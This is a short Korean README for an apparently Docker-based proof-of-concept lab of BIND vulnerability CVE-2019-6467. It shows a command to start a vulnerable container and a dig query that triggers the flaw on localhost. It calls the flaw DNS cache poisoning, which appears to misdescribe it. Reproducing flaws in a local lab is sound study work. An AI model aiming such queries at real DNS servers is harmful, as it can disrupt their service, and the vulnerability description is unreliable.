
존재하지 않는 도메인 쿼리를 통해 DNS 캐시 중독을 유발하는 BIND nxdomain-redirect 취약점(CVE-2019-6467)에 대한 Docker 기반 개념 증명(PoC) 익스플로잇입니다.
BIND nxdomain-redirect
교육 목적으로만 사용하세요

$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467
일반 질의
$ dig @127.0.0.1 nxdomain.example.com
nxdomain은 존재하지 않는 도메인 이름을 의미하는 어떤 것으로도 대체할 수 있습니다. (예: foobar.example.com)